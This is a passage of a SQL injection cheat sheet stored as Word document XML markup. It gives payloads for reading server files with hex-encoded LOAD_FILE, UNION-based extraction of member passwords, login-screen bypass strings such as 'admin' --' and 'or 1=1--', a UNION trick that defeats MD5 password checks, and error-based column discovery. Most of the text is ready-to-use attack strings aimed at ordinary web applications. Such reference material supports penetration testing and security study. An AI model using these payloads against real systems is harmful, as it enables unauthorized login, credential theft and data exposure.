        <w:t>Hex-based SQL injection example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1ECDE8" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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LOAD_FILE(0x633A5C626F6F742E696E69)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (M) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>This will show the content of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c:\boot.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCE3B2A"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bookmarkStart w:id="20" w:name="StringModification"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String utility functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C073BB" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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ASCII()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (SMPO) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Returns the ASCII character value of the leftmost character, which is especially useful for blind SQL injections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F248C9F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>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ASCII('a')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483398BD" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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CHAR()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (SM) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Returns a character based on its ASCII value. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E77677E" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>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CHAR(64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CA4F00" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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CHR()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (P) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Returns a character based on its ASCII value. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D458126" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>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CHR(64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7879F3"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bookmarkStart w:id="21" w:name="UnionInjections"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION-based injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEB55E4"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With the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> statement, you can run cross-table SQL queries. Basically, by injecting </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, you can poison a query to return records from another table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454AD3FC"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header, txt FROM news UNION ALL SELECT name, pass FROM members </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This query will combine results from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>news</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>members</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> tables and return all of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B34150"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One sample payload might be: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>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 UNION SELECT 1, 'anotheruser', 'any string', 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DD80F1"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bookmarkStart w:id="22" w:name="UnionLanguageIssues"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dealing with language issues in UNION injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A86015"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While exploiting </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> injections, you can sometimes get errors because of different language settings (different locales in table settings, field settings, or combined table and database settings). It’s not a common problem, but you can run into it when dealing with applications that store data in different encodings. Here are a few tricks to deal with it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7B1138" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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SQL Server (S) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fieldname</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>COLLATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> SQL_Latin1_General_Cp1254_CS_AS</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (or another valid collation method, check the SQL Server documentation for details)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Example: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B507A78" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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MySQL (M) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hex()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> to deal with any encoding issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6977215D"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bookmarkStart w:id="23" w:name="ByPassingLoginScreens"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bypassing login screens (SMO+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A47C979"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SQL injection 101—here are some typical login tricks that you can use with form fields and parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F08F4E2" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A75859" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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admin' #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF5046F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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admin'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B7CF59" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 or 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A4593" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046BF3BE" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 or 1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C72839C" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 or '1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102FCB5F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 or ('1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1499AADF"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Another trick is to log in as a different user (SM*):</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>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 UNION SELECT 1, 'anotheruser', 'any string', 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663CD8B1"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Bypassing login screens that use hashed passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4751FA88"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lastRenderedPageBreak/>
        <w:t>Very few applications still store passwords in plain text. If you want to bypass authentication by supplying your own password with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> query, you will need to hash the password before replacing it. Many hashing algorithms exist, but for simplicity, the examples below use the mostly obsolete MD5 algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F051364"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An application may verify login credentials by first getting the user record based on the username and then checking if the hash of the input password value is correct. You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> results with a known password and the MD5 hash of this password. The application will then compare your password and your supplied MD5 hash instead of the hash value from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C5B0F4" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="BypassingMD5Hash"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example of bypassing an MD5 hash check (MSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22615F"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Username: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FE6689"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81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB05455"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error-based ways to discover column information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0346B"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Finding column names using HAVING and GROUP BY (error-based) (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5207CA28"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Try the following payloads in the specified order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE33FD8" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 HAVING 1=1 --</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (triggers error 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14F6BF" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 GROUP BY </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table.columnfromerror1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> HAVING 1=1 --</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (triggers error 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4AB67B" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 GROUP BY </w:t>
